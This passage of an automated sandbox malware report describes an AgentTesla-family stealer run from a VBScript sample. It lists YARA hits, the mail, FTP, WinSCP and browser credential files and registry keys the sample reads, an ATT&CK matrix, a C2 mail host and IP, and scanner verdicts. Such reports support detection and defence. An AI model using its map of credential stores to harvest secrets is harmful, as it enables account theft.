                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeCode function: 6_2_06145A94 GetUserNameW,6_2_06145A94

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.jNnIJrO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.3a9f700.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.anyname.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.3bd5498.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.jNnIJrO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.3805498.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.3805498.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.4025498.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.4025498.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.3bd5498.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.36cf700.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.3eef700.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.38b6768.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.3d06768.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.34e6768.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.413072340.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.334391664.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.333862225.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.430664818.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.431529327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.335234290.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.415518300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.818828907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: anyname.exe PID: 6000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: anyname.exe PID: 5608, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 5952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 2276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 5280, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 6456, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: Yara matchFile source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: anyname.exe PID: 5608, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 2276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 6456, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.jNnIJrO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.3a9f700.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.anyname.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.3bd5498.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.jNnIJrO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.3805498.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.3805498.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.4025498.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.jNnIJrO.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.4025498.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.0.jNnIJrO.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.0.anyname.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.3bd5498.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.36cf700.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.3eef700.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.jNnIJrO.exe.38b6768.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.jNnIJrO.exe.3d06768.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.anyname.exe.34e6768.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.413072340.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.334391664.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.333862225.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.430664818.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.431529327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.335234290.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.415518300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.818828907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: anyname.exe PID: 6000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: anyname.exe PID: 5608, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 5952, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 2276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 5280, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: jNnIJrO.exe PID: 6456, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting221Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1Input Capture11File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Scripting221Credentials in Registry1System Information Discovery114SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information4NTDSQuery Registry1Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsSecurity Software Discovery311SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion131DCSyncVirtualization/Sandbox Evasion131Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection112Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 546894 Sample: TGFTR.vbs Startdate: 01/01/2022 Architecture: WINDOWS Score: 100 44 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->44 46 Multi AV Scanner detection for dropped file 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 6 other signatures 2->50 7 wscript.exe 2 2->7         started        11 jNnIJrO.exe 2 2->11         started        13 jNnIJrO.exe 3 2->13         started        process3 file4 34 C:\Users\user\AppData\Local\...\anyname.exe, PE32 7->34 dropped 52 Benign windows process drops PE files 7->52 54 VBScript performs obfuscated calls to suspicious functions 7->54 15 anyname.exe 3 7->15         started        56 Injects a PE file into a foreign processes 11->56 18 jNnIJrO.exe 6 11->18         started        58 Multi AV Scanner detection for dropped file 13->58 60 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 13->60 62 Machine Learning detection for dropped file 13->62 64 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 13->64 21 jNnIJrO.exe 2 13->21         started        signatures5 process6 dnsIp7 74 Multi AV Scanner detection for dropped file 15->74 76 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->76 78 Machine Learning detection for dropped file 15->78 86 2 other signatures 15->86 23 anyname.exe 2 8 15->23         started        28 anyname.exe 15->28         started        30 anyname.exe 15->30         started        32 anyname.exe 15->32         started        40 mail.gnvmetalica.pe 18->40 80 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->80 82 Tries to steal Mail credentials (via file / registry access) 18->82 84 Tries to harvest and steal ftp login credentials 18->84 88 2 other signatures 18->88 signatures8 process9 dnsIp10 42 mail.gnvmetalica.pe 162.241.148.206, 49799, 49800, 49803 UNIFIEDLAYER-AS-1US United States 23->42 36 C:\Users\user\AppData\Roaming\...\jNnIJrO.exe, PE32 23->36 dropped 38 C:\Users\user\AppData\...\tmpG259.tmp (copy), PE32 23->38 dropped 66 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->66 68 Tries to steal Mail credentials (via file / registry access) 23->68 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->70 72 Installs a global keyboard hook 23->72 file11 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      TGFTR.vbs40%ReversingLabsScript-WScript.Backdoor.Bladabhindi

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\anyname.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\anyname.exe32%ReversingLabsByteCode-MSIL.Trojan.StealerPacker
                      C:\Users\user\AppData\Local\Temp\tmpG259.tmp (copy)32%ReversingLabsByteCode-MSIL.Trojan.StealerPacker
                      C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe32%ReversingLabsByteCode-MSIL.Trojan.StealerPacker

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      6.0.anyname.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      18.0.jNnIJrO.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      14.0.jNnIJrO.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      14.2.jNnIJrO.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      14.0.jNnIJrO.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      6.2.anyname.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      6.0.anyname.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      14.0.jNnIJrO.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      18.0.jNnIJrO.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      18.0.jNnIJrO.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      18.0.jNnIJrO.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      18.2.jNnIJrO.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      6.0.anyname.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      18.0.jNnIJrO.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      14.0.jNnIJrO.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      14.0.jNnIJrO.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      6.0.anyname.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                      6.0.anyname.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://pZXqS7KWMFA4rh4s.net0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://www.fontbureau.comI.TTF0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.fontbureau.comcoma=0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.ascendercorp.com/typedesigners.html00%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/20%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/fi-fj0%Avira URL Cloudsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/N0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.fontbureau.comrsiv0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/#0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://PGwAqe.com0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cnd0%URL Reputationsafe
